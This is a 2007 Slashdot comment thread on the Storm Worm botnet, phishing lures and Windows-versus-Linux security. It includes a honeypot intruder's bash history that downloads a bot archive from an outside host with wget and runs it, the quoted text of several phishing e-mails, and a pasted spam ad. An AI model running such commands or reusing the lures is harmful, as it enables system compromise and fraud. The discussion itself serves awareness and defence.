( and no, cancel or allow crap isnt fixing the flaw, its applying an annoying bandaid to a gaping hole )

Re:How does the infection spread?

[Chris+Tucker]

To quote from a previous comment:

"Now of course, if anyone is dumb enough to follow the link, AND accept an executable download, AND run that download, they will be infected. Is that what's actually happening here?"


I received the following the other day:

From: hes@cat.rpi.edu
To: -redacted-@gis.net
Subject: Message could not be delivered
Date: Sun, 26 Aug 2007 06:36:51 -0400
X-Rcpt-To:
X-DPOP: Version number supressed

Dear user of gis.net,

We have detected that your email account has been used to send a huge amount of junk email during this week.
Obviously, your computer was compromised and now runs a trojaned proxy server.

We recommend you to follow instruction in the attached text file in order to keep your computer safe.

Sincerely yours,
gis.net user support team.

With, of course, an attached file that was not a text file, but a trojan.

So, to answer the question, YES. People ARE THAT STUPID.

Despite the fact that the email did not originate with GIS in Newton Massachusetts, but at Rennsaleer Polytechnic Institute in New York, some luser using GIS will have clicked on that trojan and will have gotten his machine 0wned.

Re:How does the infection spread?

[ji777]

At the risk of being mocked, I nearly fell for one of these once. It was a few years ago, the card/message/whatever it was claimed to be coming from a named co-worker (I guess it somehow came across the persons name and used it, or they were infected which I doubt). Around this time I remember there were quite a few of us (graduate students in a sciences program) noting we had gotten these notes 'from each other'. My guess is they were culled off of our program webpages which list our names and e-mails for anyone to see.

Have people just decided that trying to 'personalize' infections with acquaintance details are not worth the added trouble? I guess anonymous contact adds the "who could it be?" enticement... but I have to admit the personalized attack nearly got me (hey there was a real chance the named individual had a crush on me... and she was kinda cute too).

Arggg!

[JamesRose]

I hate these comments "Damn Microsoft and their inferior security". That's BS, the reason Windows gets hacked is because there are so many more MS machines than any other type of machine. Botnets are there to make money, the more machines they infect the more spam they produce, the more money tehy make. If you want to infect machines, you go for Windows because it has by far the most market share, so it returns the biggest profit. So all the people hacking machines aim at Windows, and multi-million dollar businesses solely aimed at hacking Windows, if any other operating system had that much focus given to it, it would collapse in days, so stop with all the shit about MS having bad security, they do quite a good job in the absolute worst circumstances and as a result only the stupid users get infections.

~Not AC cause I don't value my karma~

Re:Arggg!

Bullshit. Apache is by far the largest http server in use. You don't here that being taken over every week. Wanker!

Re:Arggg!

[DaleGlass]

Ok, and if you were a spammer, where would you rather host your spam bot? On grandma's Win98 box connected to a modem that ocassionally comes online, or a big Linux/Solaris/whatever server on a DS3? Because while Linux may not be very popular as a desktop OS, it's certainly common as a server. And servers tend to have much better connections than a normal computer.

Linux in its default configuration has no open ports and can be installed safely without a firewall defending it. Can't say the same about many MS OSes. Certainly not Windows 9x, of which there's still a lot of copies running out there (and not supported anymore, thanks MS!)

Re:Arggg!

[grommit]

Ok, and if you were a spammer, where would you rather host your spam bot? On grandma's Win98 box connected to a modem that ocassionally comes online, or a big Linux/Solaris/whatever server on a DS3?

I'd pick Option C: Millions of Windows 2000/XP boxes connected to cable/dsl.

Re:Arggg!

It is a rather odd activity, discounting one excuse for another, when in fact both are part of the bigger picture. You can argue that the popularity of the Windows OS makes it a targer for these sorts of attacks, and it is quite likely true that this family does make a larger target toa ttack that the other consumer-grade operating systems. But this obviously ignores the fact that bigger targets don't always equal less secure. There is no reason that should the situation be reversed and another OS be dominant, that this particular issue would be as bad.

For example, let us assume that Windows and Operating system Y have equal market share at 45% each. OSY comes with most services disabled, Windows comes with most services enabled, which consequently increases the number of attack vectors. Which OS would you target?

So while you raise an important point about popularity, security practices as the designer, OS, and client levels are also at fault.

Re:Arggg!

[DaleGlass]

I'd pick Option C: Millions of Windows 2000/XP boxes connected to cable/dsl.

A good deal of which have ISPs that block outgoing connections on port 25, which isn't a problem for servers.

Re:Arggg!

[Professr3]

Let's see... host on grandma's (non-geek) box, or a Linux/Solaris/whatever server on a DS3 (with sysadmins who will hunt you down across half the 'net). I am beginning to understand why they chose the way they did.

Re:Arggg!

[Sancho]

Ok, and if you were a spammer, where would you rather host your spam bot? On grandma's Win98 box connected to a modem that ocassionally comes online, or a big Linux/Solaris/whatever server on a DS3? Because while Linux may not be very popular as a desktop OS, it's certainly common as a server. And servers tend to have much better connections than a normal computer. Servers are going to be more highly scrutinized. Where I work, we have multiple IDS watching the network, and bandwidth monitors that watch for spikes. If a host started using up any significant amount of our bandwidth, we'd know, and we'd shut it down. Not so for most home computers. Bot infections can last for years on home computers when the user doesn't know that there's something wrong, or that they need to fix something.

Linux in its default configuration has no open ports and can be installed safely without a firewall defending it. Can't say the same about many MS OSes. Certainly not Windows 9x, of which there's still a lot of copies running out there (and not supported anymore, thanks MS!) Linux is a kernel. A distribution of Linux could easily have open ports, and could have vulnerabilities in those services.

Re:Arggg!

JamesRose, you're a massive dickhead. Gotta 3 clueless naabs like you.

Re:Arggg!

[rattis]

Actually some Linux Distro's do have open ports. One of the first things I do when I install a distro at work is run nmap to get a list, and then start closing them ports I don't want open. Usually those are Redhat / RPM based distros.

I do the same thing at home. Where I run Debian / Dpkg distros.

Re:Arggg!

[Crazy+Taco]

Ok, and if you were a spammer, where would you rather host your spam bot? On grandma's Win98 box connected to a modem that ocassionally comes online, or a big Linux/Solaris/whatever server on a DS3? Because while Linux may not be very popular as a desktop OS, it's certainly common as a server. And servers tend to have much better connections than a normal computer.

If I was a spammer, I would CLEARLY rather have grandma's Win98 box host my spambot. And I'm not being sarcastic, either. Just think about this for a second. You talk about a big Linux server on DS3 being better for a botnet. Big servers typically have big IT support staffs running them. How long do you think it is going to take network personnel to notice a server spitting out a lot of spam or infecting emails. I'm not going to take a guess as to how long it would take to fix the problem, but I would bet money that at most organizations infections like that are detected within the day, if not within an hour or two.

So great, you've just compromised you big Linux server, and within a day it gets cleaned up. So you have to find a totally new exploit and try to do it again. And maybe you exploit it again, and then it gets cleaned up again. Contrast that with grandma's Win98 box... she will NEVER know she is sending out spam, and will consequently take NO ACTION to clean it up. If you are going to the trouble of assembling a huge botnet for profits, you want a botnet that is going to have operational capacity for a good length of time, as that is your source of income. You have much better odds of keeping control of user's desktop PC than you do of flying under the IT staff's radar. The minute you try to use their machine as a spambot, they will pull the network connection. You can use grandma's PC again, and again, and again.

Oh, one last point... your comparison of grandma's win98 box to a server is very naive. Yes, one on one, the server completely outperforms the grandma box, but when you have multiple millions of grandma boxes, and the potential to infect tens or hundreds of millions more, the power CLEARLY lies with the desktop machines. Reason 1: We've seen many times that grids of desktops, through their sheer number, can outperform the fastest supercomputers. Reason 2: Ignoring the fact that servers have IT staff, you still have to contend with the fact that the server market uses less machines by far, and that those machines are fragmented by OS. Your exploit that targets Linux can only potentially capture a fraction of the server market, as many others run Solaris, HP UX, Windows Server, etc. With desktops, the market is FAR larger, and consolidated with a single OS. Clearly you want to target the largest market, and the fact that that market also has the least policing by IT professionals makes it an even bigger sweet spot. If I'm a spammer, I'm TOTALLY going for the desktops when making a botnet. QED.

Re:Arggg!

[kayditty]

It's just a matter of philosophy. I used to be a "cracker" and a "DoS kid" on EFNet. I didn't use Windows machines (I also didn't need/use "DDoS" networks*). Most everyone on EFNet used Linux/UNIX machines with high bandwidth connections. Now, Windows nodes with cable modems seem to be a lot more popular. I think the kids on EFNet know a little bit about what they're doing, since I was one of them (but I was never as stupid as most of them seem to be). A few of them went on to become security experts, last I've heard of them. Many of them were idiots, however. But things have changed. It's a lot easier for "script kiddies" to do this kind of thing, and Windows is just a good, easy philosophical choice. It's a choice: do I want a few hosts with high bandwidth, or many hosts with relatively small bandwidth? They can both equal the same overall amount of transfer speed in the end. The Windows vector allows for an easier entrance into the "DoS" game, though. In fact, even for an experienced attacker, it might be a better choice, for the simple fact that this kind of attack will spread relatively easy. I have seen website forums for so called "h4X0rz" (read: retards) before, where they ask one another how to write an "on join" mIRC script to send an EXE backdoor to someone joining an IRC channel.

This is what I'm talking about. The entrance barrier is much lower, and the users of Windows are more likely be gullible enough to fall for these kinds of tricks. But don't fool yourself into thinking UNIX/Linux are somehow inherently "more secure," save for the fact that most distributions don't enable useless services by default any more. I have seen very large botnets involving BSD/Linux machines before too, and these are very devastating (e.g. the 8Gbps attack on eBay/CNN/Yahoo -- which was a stacheldraht net maintained by the "49ers" EFNet takeover group, if I recall). Some of these consisted of somewhere in the neighborhood of 5,000 machines. That was probably 6-7 years ago.

* Contrary to what the first article said, an attack from a single source is not necessarily 'easier to deal with' than a multi-sourced attack:

This is only true for weak attacks that aren't sufficient to kill the upstream. If the upstream router goes, it doesn't matter. You can't filter (which seems to be what they're implying by saying a single source attack is less effective) an attack when it's saturated the entire link.

And even if the attack is relatively weak, the single host may be able to spoof its source address. Randomized addresses would be even more difficult to filter. Of course, ratelimiting isn't out of the question, in either case.

Most times, botnets today are comprised of cable modems / DSL connections on Windows machines, which might get you 100KB/s upstream per node at the most (there are exceptions). Average is probably 256Kbps today. This doesn't result in a lot of bandwidth. Of course, some of my friends back then did use DDoS networks, like stacheldraht, trinoo, and tfn2k. These were also used on high bandwidth servers, which could be a VERY big problem -- much different than the scenario of Windows machines on cable modems.

Personally, I would use about 10-15 machines to perform an attack at the most. A couple of machines had 100Mbps or fiber uplinks to OC-3s. I got just under 20MB/s for a couple of hosts in South Korea. I suspect these were on OC-3s. There was a large problem, back then, with networks in eastern Asian countries being notorious for their insecurity. Netscan.org, when it was around, largely consisted of incorrectly configured broadcast networks in Japan and South Korea, if I recall correctly. Smurf (as well as THC) was a fairly big attack then. I used it a few times, but, at others, I would just use stream or something else on a few single hosts. I don't really remember the program I used most. But I could reach about 500-800Mbps of bandwidth, and this was probably from 1998-2001, and maybe 2002.

This would probably be different now. The climate is

Re:Arggg!

[BenoitRen]

Linux in its default configuration has no open ports and can be installed safely without a firewall defending it. Can't say the same about many MS OSes. Certainly not Windows 9x, of which there's still a lot of copies running out there

A lot of people are talking out of their ass these days when it comes to Win9x. Have you actually verified what you wrote? I don't think so, because Win9x by default does NOT open ports! No, not even NetBIOS! Win95, by default, doesn't even install TCP/IP.

Re:Arggg!

[mrbridal]

You know, I love the whole "linux is more secure" bullshit that a lot of people get hooked on. I had a vendor connect to one of my networks (with 3gbps of uplink, screw your DS3, kid) a couple weeks back with a set of servers running CentOS. Default install, right out of the box. It took less than a day for the entire setup to get hacked, causing me to disable their uplink. This is the second vendor we have had who brought in Linux servers that have been compromised. On the other hand, our IT department, that controls our corporate data center, has over a hundred windows server 2003 machines that have *never* been compromised. What this says is simple; its not the operating system, its the user or the administrator. New sysadmins rarely understand true security. And new sysadmins rarely administer the Linux servers - they get stuck with the Windows servers and keeping all the Windows desktops safe. I am not defending Windows. I am not promoting Windows. If I need a DNS server, I use Linux. If I need a NEBS compliant server to team with with a softswitch, I use Solaris. If I'm capturing IP packets for troubleshooting, I use Windows. If I need a firewall, I buy one. Every job has the proper tool. -Rob

Re:Arggg!

[Jarik_Tentsu]

Comparing a Linux/Solaris server to a Windows98 box is like comparing a car to a plane. Of course a server is going to be more secure. A better comparison would be a WindowsNT server box, which has competent administrators versus a Linux/Solaris box with competent administrators.

~Jarik

Re:Arggg!

[RedHat+Rocky]

Homework assignment:

Do some research and read about when Microsoft first started talking about ActiveX and the response of the industry at that time.

Hint: The response was unfavorable and mainly for security reasons.

Extra Credit: Name three Windows exploits that required no user interaction to be successful that existed within the last 5 years.

Re:Arggg!

That's BS, the reason Windows gets hacked is because there are so many more MS machines than any other type of machine.

Nope. If you're a bot looking for machines connected to the Interwebs to install yourself onto, you will find SERVERS all over the place. Lots and lots of Linux servers. They are much more difficult to break into because they have fewer security holes, not because there are more or less of them.

Windows, including brand-spanking-new versions of Windows, gets hacked all the time because its security sucks. It has always sucked. Bill Gates said "Nobody pays for bugfixes", and you can't figure out why that means that it will always suck, then you deserve Windows.

Re:Arggg!

[Zeussy]

Ok, and if you were a spammer, would you spend the time to try and hack a secure server, run by very knowledgable admins (hopefully) who would not let something like that happen at all, as you say Linux in its default config has no open ports.
 
Or would you try and obtain as many WinXP machines on decent ADSL and cable connections (256kbit/sec upload can send a lot of html based mail). Sure there are thousands of webservers around the place. But any admin worth his salt will quickly work out what is happening when his upload bandwidth gets saturated and CPU load on the servers seems unsually high. Most WinXP users dont even know what Task manager is, those are the targets I would go for.
 
If a major distro of linux (say Ubuntu) was 90% of the desktop market, this trick would still work. It asks the user to install something and click past the warning (Ubuntu's case password protection for installing an app). 90% of the users are idiots or not digital natives changing the OS isnt going to fix that.

Brings up a point

[gerf]

Imagine if they put this botnet to a real use, like Seti@Home. They'd be uber-points people in no time.

But noooo, they have to be all evilly criminal types, don't they.

Re:Brings up a point

[bmo]

"Imagine if they put this botnet to a real use, like Seti@Home."

I thought about doing this for folding@home (cure cancer with a virus!), but once you get mondo points, someone's going to ask if you have _legitimate_ access to all those computers. Vijay likes to keep everything above board.

As for seti@home, I'd run it if it wasn't for the idea that I have that as communication gets more advanced, the less there is reliance on sending analogue electromagnetic waves hither and yon through the aether. SETI assumes that other civilizations will be using broadcasting instead of more targeted means of information transfer (cable, fiber optic, etc) and assumes analogue transmission instead of digital. After about 100 years on this planet, broadcast analogue is becoming "old fashioned." How likely is it that we are going to see that gnat's blink 100 or 200 year lifetime of analogue broadcast from other civilizations?

--
BMO

Re:Brings up a point

[digitalchinky]

The term Analogue or Digital is not so relevant. There is a visible energy lobe for just about every transmission type, even spread spectrum is obvious and usually well above the noise floor on just about any low end spec/an. TV might fully go the way of copper or fiber, but there are still millions upon millions of other uses for radio. Look how wide spread WiFi has become in just a few short years. You only need a few milliwatts of power on the right frequency to be picked up by satellite. RADAR pumping out kilowatts of energy, emergency services, military, the list is endless. I would imagine radio isn't going to vanish anywhere in the next few hundred (or thousand) generations, unless we stone age ourselves in between.

Re:Brings up a point

[Torvaun]

The problem isn't detection, it's interpretation. Let's say that someone intercepts some of our traffic. This isn't hard to imagine at all. But it gets considerably more complicated once you start accounting for Doppler and interference, especially if you want to send any sort of meaningful data. Now, you have a massive chunk of encoded data that they have never seen before. It would be like going up to average Joe with the puzzle out of the back of a issue of 2600, and asking him what it says. There's no freaking way.

That's the problem with SETI. The odds on catching anything that looks remotely different from background static are very, very bad. If we did, we wouldn't know what it says. And if we could figure out what it says, it's very likely to be in a format no one understands. And then, once we've gotten through all that, we don't know the language. We have the same odds on meaningful communication with the static.

Re:Brings up a point

[mikiN]

Imagine if they put this botnet to a real use, like Seti@Home. They'd be uber-points people in no time. Just imagine a Beowulf clus... never mind.

When this botnet manages to get first post on Slashdot on each and every new article posted for a day, I will take notice. When it manages to get Slashdot Slashdotted, I'll be impressed.

Re:Brings up a point

[cstdenis]

We have some very clever linguists and cryptologists that can make sense out of what seems to the average person to be nonsense.

If we were able to find a signal that looked like its something I think we have a good chance of extracting some useful information from it.

I don't think it would be easy. It would probably take decades or even centuries, but I think we could do something useful with it in time.

Re:I had a 500% increase in Spam on Tuesday Last W

[omeomi]

I definitely started to get these "face is all over 'net" SPAMs at about that point in time...I've been getting a few per day since.

Now THESE guys...

[Mr.+Yetti]

...are more like the "terrorists" the government keeps telling us to cower under our desks from. I don't spend every morning checking under my hood and in my trunk to see if some guy with his head in a towel (-- that was to make a point, not my opinion) has managed to sneak a bomb in there. I _do_, however, check my inboxes everyday to delete the 30-40 spam/infected emails that show up.

Exchange 2003 SP2 IMF

[DigiShaman]

Unless you've got GFI or Symantec Mail Security, I'd suggest setting up IMF. It's a free spam filter included in Exchange 2003 SP2. Below is a link to get you started.

http://www.petri.co.il/block_spam_with_exchange200 3_imf.htm

Obviously it doesn't prevent the spreading of SPAM, but it doesn't mean you have to live with the incoming onslaught.

Re:Exchange 2003 SP2 IMF

[BenoitRen]

I prefer BRAIN.EXE

Famous repl1ca w4tches r0lex Cartier Bvlgari

Have you always wanted a R0lex, but don't want to pay high prices for a brand name w4tch? Then you need to visit Prest1ge Repl1cas, a website dedicated exclusively to high quality repl1cas, with the most extensive inventory on the web and a proven track record of satisfied customers. http://www.shegebb.com/ Prest1ge Repl1cas offers hundreds of R0lex repl1ca w4tches starting just above $100, and during this summer season, their already low prices have been slashed by 15 percent if you buy two or more w4tches! No matter which model R0lex you choose, their 15% discount applies to them all! But don't let this limited time offer go by... summer is ending
and it's time to impress your friends with a realistic, high quality R0lex
repl1ca w4tch, that will look and perform just like the real deal!
http://www.shegebb.com/



If you want to be excluded from th1s ma1ling
http://www.shegebb.com/m0veme/
We will process your request in 48hr's

I don't think he gets it...

"Bullshit. Apache is by far the largest http server in use. You don't here that being taken over every week. Wanker!" - by Anonymous Coward on Sunday August 26, @01:34PM (#20363339) You don't get it, do you? In an attack like this, they're NOT after the server systems!

The botnet herders are after client's nodes that use servers, more than anything... why?

Well, to get their bank account numbers, OR other financial data, or to fool you into buying some malware, for example.

If you were to design such a system, wouldn't YOU also go after the most used platform there is, in order to increase your surface attack vector for it? Of course you would.

And, what's the most used OS platform there is out there? Windows... & thus it gets attacked the most & especially in attacks of THIS nature.

APK

P.S.=> I know 1 thing, for sure, from actual tests & challenges I issued here @ this site - Windows can be made SO SECURE, via custom-hardening it by hand, that the /. crowd here outright RAN & evaded taking a multiplatform test of security called CIS TOOL here, 30x ++ by now:

E.G.-> HARDENING LINUX THREAD @ SLASHDOT WHERE I ISSUED CHALLENGES & A LIST OF THEM TO *NIX FOLKS:

http://it.slashdot.org/comments.pl?sid=267599&cid= 20203061

Vs. the 84.735/100 score (now up to 85.185/100 here currently in fact) I can obtain on it & CIS TOOL is noted by SANS & COMPUTERWORLD (often cited here on this site no less) as a tool that helps you secure yourself... so, so much for this statement which I see here in essence as this, quite often:

"(Insert *NIX variant here) is more secure or securable than Windows"

Well, ok - but, when faced with the challenge of "putting their money where their mouth is"? Each *NIX user, ran (& I specifically wanted SeLinux kernel hook addon users of UBUNTU/KUBUNTU + FreeBSD users to try it especially)... apk

Re:I don't think he gets it...

no, i'm pretty sure it's YOU that doesn't get it. YOU, not him. YOU








YOU!!

Re:Ha! ISPs?

[ispsuckz]

Isps could block all this spam at there level, but they don't. As much as I blame Microsoft it has a lot to do with the networking world. The networking world is allowing this stuff to happen, probably because engineers would rather make $$$ cracking than defending from users from attacks. Telecoms and cable companys want chaos so they can harvest info. You are tripping if you think big companies don't dabble in this stuff. They could stop it, I have seen papers with solutions, they won't implement them though. WGA is another big reason this still goes on.

Interesting Question

[spikedvodka]

This whole scenario brings up a rather interesting question: Is this a Spam problem, or a virus problem?

From my understanding there is no viral content in the message, so your virus scanner would have no reason to block the message. A Spam filtering company could well "pass the buck" and say that this is a virus problem, yes it's going to trigger on some spam rules, but "Where it's a virus problem, why create special rules for it"

I can see this type of attack becoming more popular in the future, at least until this question is solved.

Re:Interesting Question

[prshaw]

I think this is very much a spam problem.

I don't want someone blocking me downloading another email program that will send out emails. That is not a bad thing, I might not like Outlook Express. So getting a program that does what Storm Worm does (sends email) is not really a bad thing.

I don't want someone blocking me downloading a program that runs under the control of a master program, and keeps reporting results back to it. Think the Seti type programs, or the other distributed applications that share our computing power to solve some problem.

So I don't think we want to claim any program that sends email or is part of a distributed system is a virus to be blocked. Storm Worm does the good/right/advanced things we want our connected computers to do, it is just doing it for an undesirable purpose. Stopping/preventing things like this are going to be a big problem because we don't really want to stop what it does. We want to stop how it is being used, but not prevent the functionality.

So I think it is a spam/email problem. One possible solution to this might be some sort of verification/validation of who actually sent the emails. The forging of the addresses in an email help social engineered emails work.

Re:Interesting Question

[spikedvodka]

I think, with all due respect, that you missed the point of my question.

If a message is trying to sell me "V1A afdsuiwre GRA", SpamAssassin takes care of it, and scores it to hell, and I never see it;
If a message is infected with Trojan.Dropper.C ClamD detects it, flags it as a virus, and I never see it.

(If anybody has the text of one of these, and they feel like posting it, that would be cool, 'cause I haven't gotten any... I feel so unloved, just like when the lovebug went around)

Yes the message falls under the aegis of "unwanted e-mail", but New rules may have to be written to mod it to hell & back
There's no viral payload in the message, but yet the message has the potential to infect the recipient with a virus

Re:Interesting Question

[prshaw]

But what if you get an email saying a family member sent you an online ecard?

I have received those from family members around my birthday, and I have recieve Storm Worm generated ones. What is the difference? How do you tell them apart? How would a spam or anti-virus filters tell them apart?

What makes Storm Worm so difficult is that without inspecting who actually sent the email, or the page it links to, you cannot block the emails without also blocking legit emails.

Re:Interesting Question

[spikedvodka]

Hence the problem.

Personally I think all of the e-card things (illegitimate, and otherwise) should all rot in hell. If I want to sell my e-mail address to spammers, that's my thing

Re:Interesting Question

[digitalchinky]

I agree that it is a spam based problem, but your solution would not work. Who is in control of the verification and validation process? How do you solve the impossible task of preventing spammers from becoming validated and verified senders as well. SPF prevents me from saying I am someone else, though it doesn't prevent abuse of the SPF record, anyone can simply say they allow stupidly large numbers of computers to be authorized to send from any number of domains.

The cost barrier has never stopped spammers from buying up millions of throw away domain names, they have to be making serious money somewhere along the way.

Nice idea, just a pity it wont work. There are some very smart people working over the problem, if there was an easy solution, it would have happened long ago. I'm guessing many people here will have had an uninformed boss or two ask about affiliate programs, distributed marketing schemes, page ranking, and a host of similar trashy scams. Sometimes it's hard to say no to the person that hands out the money every pay day.

It's a human problem with no all encompassing technical solution.

Re:Interesting Question

[digitalchinky]

Subject: Where did you take that?
From: <corrym@email.cz>
Date: Sun, 26 Aug 2007 15:12:52 +0100
To: <Removed>

If your dad see this video you made, he is gonna kill you. here is the link I got http://www.youtube.com/watch?v=34BmcXqxdPo

Re:Interesting Question

[prshaw]

It doesn't really matter who is in control of the verification process. And you would want the spammers to be verified, not prevent it. Knowing that an email is coming from someone I have blacklisted is better then getting an email and saying I don't know who this is really from, guess I have to check it out. So a major function needs to be to accurately say who sent an email, including spammers.

The process would not stop people from sending me email, wanted or not. It would let me know who sent the email so I can base part of my processing on who sent the email. Part of the problem now is that we don't have a feasable way of telling who actually sent an email.

There is one 'easy' solution, but it is not practical. Replace the entire email system with a new one. I will agree that there isn't an easy solution that anyone has found that is practical. But part of what we need to do is look for fixes and bandaids to our current system so we can hopefully evolve into a better system. Because at the current rate things are going it won't be long before email is as useful as nntp/newsgroups.

SPF could be part of the solution in the future, but it will need to be a 'required' feature of email to be useful. It's part of the practicality problem, until we can get everyone using it we are stuck with most of our email being from an unknown source.

If only they could use the botnet for the good...

[Jafafa+Hots]

... of all mankind. A distributed computing project for the benefit of the human race. Like, cracking blu-ray DRM or something.

It's not just windows they're exploiting...

[nick13245]

For instance, here's a recent attack to my honeypot (Running Slackware Linux)

root@zomg:~# cat /home/webmaster/. ./ .bash_history .ssh/ ../ .screenrc .xsession
root@zomg:~# cat /home/webmaster/.bash_history
ssh localhost
w
cat /etc/hosts
cat /proc/cpuinfo
passwd
cd /var/tmp
ks
l
sl
ls
ls- all
ls -all
mkdir " "
cd " "
clear
wget imaginez0r.xhost.ro/botme.tar.gz
tar zxvf botme.tar.gz
rm -rf botme.tar.gz
cd .bot/
PATH=.:$PATH
bash

These kind of attacks happen every day, sometimes more than once a day. If you don't patch and secure your machine, or do stupid things like download and run binaries, it's gonna get owned. Doesn't matter what OS you run.

Re:It's not just windows they're exploiting...

[MarkRose]

Interestingly enough, imaginez0r.xhost.ro/botme.tar.gz is still available for download. Looks like the bot is controlled by IRC.

Re:It's not just windows they're exploiting...

[kayditty]

That is an Energy Mech bot. It used to be the most common alternative to the Eggdrop bot, but it is not nearly as well known. Most experienced IRC users preferred Eggdrop for various reasons. Energy Mech had a reputation for being very resource intensive.

Re:It's not just windows they're exploiting...

[Cyrus]

Any chance you can share what attack vector they used to root your system?

Re:It's not just windows they're exploiting...

[nick13245]

Any chance you can share what attack vector they used to root your system? Sure, poor passwords on user accounts. They just brute force usernames and passwords on the SSH server until they get in. While there is a number of methods to prevent this vector of attack (deny hosts, better password policy), most users don't bother to implement them.

Re:It's not just windows they're exploiting...

[Cyrus]

Thanks. I recently implemented denyhosts... I love it.

Re:It's not just windows they're exploiting...

[inKubus]

Yeah, that link is just to an eggdrop-based bot. It connects to the irc channel and probably lets the next layer of the botnet know it's alive. This is one of many tools they use to fully exploit an open box. The bot probably has the ability to remote run commands. That script in the GP looked a lot like a human was doing the typing though, due to spelling errors, etc.

As far as xhost, You can get a free account too :). Storm is pretty scary, and there's bad people out there wanting to use your computing resources illegally.

Make sure you run logwatch and logrotate and md5 the logs when they rotate (and rotate frequently, like every minute). Then store the checksum somewhere innocent after rotating. Have logwatch automatically check the checksums on all existing logs and report on that also. hosts.deny everything but your own personal IP address (in hosts.allow) on all ports except those you need to do business. SSH ONLY, don't use telnet or other unencrypted connections. Don't allow root to connect from SSH. Don't allow su from ssh (if possible). Compile your own stuff (including your compiler), never run binaries. Use shadow passwords. Put all of your binaries on a read-only mounted partition, with /var /tmp on a read/write (this is pretty good to do if you have a stable setup, such as a web server). If you can't do that, break your services into virtualized boxes using Xen or VMware or something so you can quickly recover from a saved image if something does happen. Regularly nmap, nessus and satan your box for holes. Put a passive hardware sniffer between your box and the 'net to look for suspicious packets. Etc.

Most of this is duh stuff and easy to do, and you should have it written in your procedures for building a new box. I believe the NSA has some guidelines also.

Re:It's not just windows they're exploiting...

In order to _use_ a computer, I shouldn't have to learn how to do all of that.

Re:It's not just windows they're exploiting...

[inKubus]

In order to _use_ a computer, I shouldn't have to learn how to do all of that.

In order to live in life, you have to learn how to lock your doors, drive safely, not talk to strangers as a kid, look both ways before crossing the street, etc. Computers are a huge and encompassing part of life, and you should know how to keep your computer safe and secure. We just happen to be at a point in history where there are a lot of people who weren't raised learning about computers trying to operate them. This too shall pass. You have the opportunity to be ahead of your time, an everyday joe that knows something most people don't. Or you can just say "I shouldn't have to do that" "I shouldn't have to pay bills" "I shouldn't have to work the rest of my life". Sorry, life sucks, get a helmet. You SHOULDN'T expect anything from anyone else, and if you haven't learned that yet, I hope someday you will.

was wondering about that

[v1]

social engineering attack involving YouTube. The emails, which may be targeted at people who use private domain registrations, warn the recipient that their "face is all over 'net" on a YouTube video.

I don't normally get much spam - maybe one every other week, but I've gotten two of those lately

OMG, what are you doing man. This video of you is all over the net. go look at it... http://www.youtube.com/watch?v=lAC5mj7oew5 (link goes to http://90.31.69.105/)

and

LMAO, I cant believe you put this video online. Everyone can see your face there. LOL check it out yourself http://www.youtube.com/watch?v=ZKil6gyJXhQ (link goes to http://79.178.78.71/ )

Look at all the retards with their owned boxes lowering our quality of life...

Re:was wondering about that

A friend of mine got one of these. I looked into it. The one she received had what looked like a vid screenshot of her. When viewing the html source you will notice that the top bar and the vid control bar on bottom are both images linked back to the site that you go to if you click it. The picture in the middle is the actual picture of their profile pic, pulling directly from MySpace. Bad thing is that if you delete that picture from MySpace, it still hangs around for awhile. MySpace appears to keep the image on their servers for awhile. Not sure how long.

I checked the WHOIS info for the site linked if you click on the vid. This particular one was created a few weeks ago.

If you happen to click what looks like the video, you are transferred directly to the main site and it says the video you are requesting has gone over it's bandwidth. If you look in the status bar before clicking the "video" you will see that it only links directly to the main page on that site.

I had her change her password, and then delete her profile pic. I then told her to change her password again a few days later from a different computer. No word on any major infections. Her main machine is running OSX, but when she first viewed the email and clicked the image she was running her father's XP machine. I am running Etch on the machine I used to view the information. No record of further problems, but I will make sure to have her father recheck his machine.

I cannot remember which site they were redirected to as I have since cleared my history, and nothing is showing in my bash history for that whois lookup.

Windows is inherently less secure

[argent]

the reason Windows gets hacked is because there are so many more MS machines than any other type of machine.

If that was the case, then why are Microsoft applications (like IIS) more often compromised than non-Microsoft applications even in areas where Microsoft is NOT dominant?

Windows is inherently less secure than most of the competition in a number of ways.

1. The Microsoft HTML control's use of ActiveX is inherently insecure and can not be fixed without breaking every application that uses the HTML control.
1a. This insecure design was deliberate and Microsoft fought the Justice Department to a standstill rather than change or replace it.
2. Windows requires a number of insecure services to run to perform routine operations.
2a. There is no way to force these services to be run local-only without using a firewall.
2b. This means that Windows Firewall has to be used to secure Windows to the same degree as a UNIX based system WITHOUT a firewall.
3. Windows document formats are still based on serialized COM objects. It's even possible for them to include serialized COM objects in XML files.
3a. Serialized COM objects can refer to or even contain insecure code that can be used for an attack.

The idea that any one of these three issues and theor consequent corollaries are accepted boggles my mind. The idea that they're defended by the claim that the only reason Windows is more often compromised is that it is more common...I can not conceive of the confusion in the mind that would lead to such a conclusion.

Re:Windows is inherently less secure

IIS 6 has never had a remote root, and it's four years old.

Re:Windows is inherently less secure

[argent]

1. The point is that popularity is not the only or even the primary reason why a product can be attacked.
1a. Back in the old "classic" Mac era the Mac went through a period where it was the prime target for attacks, despite it having a fraction of the market, simply because it had such a huge surface area to attack.
1b. Apple responded to many exploits (for example, in autorun CDs and floppies) by removing dangerous capabilities.
1c. Similarly, UNIX systems usually don't come with the "r" suite enabled or often even installed any more.
2. The problems I listed have not been fixed or even addressed by Microsoft.
2a. Windows is still vulnerable to autorun attacks in CDs and USB keys.
2b. Windows still comes with dangerous components like SMS.
3. http://archives.neohapsis.com/archives/fulldisclos ure/2005-04/0400.html

Idiot-proofing the ultimate tool

[quokkapox]

You know, I can go and buy a microwave oven and plug it safely into a standardized outlet and not electrocute myself or blow up my house. I can even buy a propane tank and fire up my grill without risking my life too much. I can buy a modern automobile and feel confident that if I drive it into a tree at 30 MPH or roll it over, I still have a reasonable chance of surviving. Most things have built-in standardized safety features and/or safe failure modes (within reason).

These things I can buy are all tools, some with licensing or age restrictions attached, but all more-or-less idiot-proofed. The razor blades I bought recently to scrape paint off my windows even warned me that they were "razor sharp". Well duh.

But the most sophisticated, most powerful, most versatile, general purpose tool we humans have yet invented, the networked personal computer, has been sold to and is used by millions of people without any training whatsoever and without any warnings outside of what one might pick up from the "Dangers in Cyberspace" fluff segment on the local news.

People are using computers more and more to organize all of their critical financial information. A single security breach can have catastrophic, real consequences, if for example your identity is stolen and your credit is ruined after your bank accounts are drained overnight.

All you have to do is click on one really bad link. Sometimes, not even that.

This is just another example of how technology is changing human society in completely unpredictable ways. Back in the 80's, you might have worried about a virus wiping out your word processing file. Today, typing your username and password on an untrusted machine, even just once, can compromise your entire life, and ruin your future.

Re:Idiot-proofing the ultimate tool

[Lord+Balto]

